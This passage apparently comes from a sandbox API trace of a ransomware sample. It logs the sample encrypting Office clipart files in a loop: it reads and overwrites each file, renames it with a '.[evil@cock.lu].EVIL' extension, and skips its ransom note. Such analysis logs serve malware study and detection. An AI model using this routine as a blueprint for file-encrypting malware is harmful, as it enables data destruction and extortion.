1 [0171.226] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02578_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0171.226] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0171.227] __uncaught_exception () returned 0x84b1160800 [0171.227] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0171.227] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02578_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02578_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02578_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02578_.wmf.[evil@cock.lu].evil")) returned 1 [0171.228] ??_V@YAXPEAX@Z () returned 0x1 [0171.231] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02578_.WMF", dwFileAttributes=0x200) returned 0 [0171.231] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0171.231] wcsstr (_Str="SO02617_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0171.231] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02617_.WMF") returned 69 [0171.231] wcscmp (_String1="SO02617_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0171.231] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02617_.WMF") returned 0x0 [0171.231] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02617_.WMF") returned 0x45 [0171.231] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02617_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02617_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0171.234] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5fec, lpOverlapped=0x0) returned 1 [0171.263] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.263] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.263] _errno () returned 0x84b1160840 [0171.263] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.263] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x6000, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6000, lpOverlapped=0x0) returned 1 [0171.263] CloseHandle (hObject=0x1a8) returned 1 [0171.263] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02617_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0171.264] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0171.264] __uncaught_exception () returned 0x84b1160800 [0171.264] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0171.264] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02617_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02617_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02617_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02617_.wmf.[evil@cock.lu].evil")) returned 1 [0171.265] ??_V@YAXPEAX@Z () returned 0x1 [0171.269] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02617_.WMF", dwFileAttributes=0x200) returned 0 [0171.269] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0171.269] wcsstr (_Str="SO02790_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0171.269] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02790_.WMF") returned 69 [0171.269] wcscmp (_String1="SO02790_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0171.269] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02790_.WMF") returned 0x0 [0171.269] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02790_.WMF") returned 0x45 [0171.269] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02790_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02790_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0171.271] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7f4e, lpOverlapped=0x0) returned 1 [0171.311] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.311] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.311] _errno () returned 0x84b1160840 [0171.311] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.311] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x7f60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7f60, lpOverlapped=0x0) returned 1 [0171.311] CloseHandle (hObject=0x1a8) returned 1 [0171.311] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02790_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0171.311] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0171.312] __uncaught_exception () returned 0x84b1160800 [0171.312] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0171.312] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02790_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02790_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02790_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02790_.wmf.[evil@cock.lu].evil")) returned 1 [0171.313] ??_V@YAXPEAX@Z () returned 0x1 [0171.316] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02790_.WMF", dwFileAttributes=0x200) returned 0 [0171.316] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0171.316] wcsstr (_Str="SO02791_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0171.316] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02791_.WMF") returned 69 [0171.316] wcscmp (_String1="SO02791_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0171.316] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02791_.WMF") returned 0x0 [0171.316] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02791_.WMF") returned 0x45 [0171.316] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02791_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02791_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0171.319] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x430c, lpOverlapped=0x0) returned 1 [0171.329] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.329] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.329] _errno () returned 0x84b1160840 [0171.329] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.329] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x4320, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4320, lpOverlapped=0x0) returned 1 [0171.329] CloseHandle (hObject=0x1a8) returned 1 [0171.329] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02791_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0171.329] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0171.329] __uncaught_exception () returned 0x84b1160800 [0171.329] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0171.330] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02791_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02791_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02791_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02791_.wmf.[evil@cock.lu].evil")) returned 1 [0171.331] ??_V@YAXPEAX@Z () returned 0x1 [0171.334] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02791_.WMF", dwFileAttributes=0x200) returned 0 [0171.334] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0171.335] wcsstr (_Str="SO02793_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0171.335] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02793_.WMF") returned 69 [0171.335] wcscmp (_String1="SO02793_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0171.335] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02793_.WMF") returned 0x0 [0171.335] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02793_.WMF") returned 0x45 [0171.335] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02793_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02793_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0171.337] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5b70, lpOverlapped=0x0) returned 1 [0171.354] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.354] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.354] _errno () returned 0x84b1160840 [0171.354] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.354] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x5b80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5b80, lpOverlapped=0x0) returned 1 [0171.354] CloseHandle (hObject=0x1a8) returned 1 [0171.354] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02793_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0171.355] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0171.355] __uncaught_exception () returned 0x84b1160800 [0171.355] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0171.355] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02793_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02793_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02793_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02793_.wmf.[evil@cock.lu].evil")) returned 1 [0171.356] ??_V@YAXPEAX@Z () returned 0x1 [0171.358] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02793_.WMF", dwFileAttributes=0x200) returned 0 [0171.359] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0171.359] wcsstr (_Str="SO02794_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0171.359] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02794_.WMF") returned 69 [0171.359] wcscmp (_String1="SO02794_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0171.359] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02794_.WMF") returned 0x0 [0171.359] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02794_.WMF") returned 0x45 [0171.359] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02794_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02794_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0171.361] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4b7a, lpOverlapped=0x0) returned 1 [0171.370] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.370] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.370] _errno () returned 0x84b1160840 [0171.370] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.370] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x4b80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4b80, lpOverlapped=0x0) returned 1 [0171.370] CloseHandle (hObject=0x1a8) returned 1 [0171.370] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02794_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0171.371] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0171.371] __uncaught_exception () returned 0x84b1160800 [0171.371] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0171.371] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02794_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02794_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02794_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02794_.wmf.[evil@cock.lu].evil")) returned 1 [0171.372] ??_V@YAXPEAX@Z () returned 0x1 [0171.375] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02794_.WMF", dwFileAttributes=0x200) returned 0 [0171.375] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0171.375] wcsstr (_Str="SO02862_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0171.375] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02862_.WMF") returned 69 [0171.375] wcscmp (_String1="SO02862_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0171.375] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02862_.WMF") returned 0x0 [0171.375] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02862_.WMF") returned 0x45 [0171.375] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02862_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02862_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0171.377] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1262e, lpOverlapped=0x0) returned 1 [0171.385] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.385] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.385] _errno () returned 0x84b1160840 [0171.385] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.385] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x12640, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x12640, lpOverlapped=0x0) returned 1 [0171.385] CloseHandle (hObject=0x1a8) returned 1 [0171.385] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02862_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0171.385] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0171.386] __uncaught_exception () returned 0x84b1160800 [0171.386] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0171.386] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02862_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02862_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02862_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02862_.wmf.[evil@cock.lu].evil")) returned 1 [0171.387] ??_V@YAXPEAX@Z () returned 0x1 [0171.389] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02862_.WMF", dwFileAttributes=0x200) returned 0 [0171.390] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0171.390] wcsstr (_Str="SO02886_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0171.390] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02886_.WMF") returned 69 [0171.390] wcscmp (_String1="SO02886_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0171.390] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02886_.WMF") returned 0x0 [0171.390] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02886_.WMF") returned 0x45 [0171.390] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02886_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02886_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0171.392] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x967a, lpOverlapped=0x0) returned 1 [0171.678] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.678] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.678] _errno () returned 0x84b1160840 [0171.678] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.678] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x9680, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9680, lpOverlapped=0x0) returned 1 [0171.679] CloseHandle (hObject=0x1a8) returned 1 [0171.679] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02886_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0171.679] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0171.679] __uncaught_exception () returned 0x84b1160800 [0171.679] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0171.679] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02886_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02886_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02886_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02886_.wmf.[evil@cock.lu].evil")) returned 1 [0171.680] ??_V@YAXPEAX@Z () returned 0x1 [0171.683] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02886_.WMF", dwFileAttributes=0x200) returned 0 [0171.683] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0171.683] wcsstr (_Str="SO02958_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0171.683] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02958_.WMF") returned 69 [0171.683] wcscmp (_String1="SO02958_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0171.683] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02958_.WMF") returned 0x0 [0171.683] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02958_.WMF") returned 0x45 [0171.683] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02958_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02958_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0171.685] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x22f4, lpOverlapped=0x0) returned 1 [0171.701] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.701] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.701] _errno () returned 0x84b1160840 [0171.701] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.701] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x2300, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2300, lpOverlapped=0x0) returned 1 [0171.701] CloseHandle (hObject=0x1a8) returned 1 [0171.701] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02958_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0171.702] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0171.702] __uncaught_exception () returned 0x84b1160800 [0171.702] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0171.702] MoveFileW (lpExistingFileName="C:\\\\Program 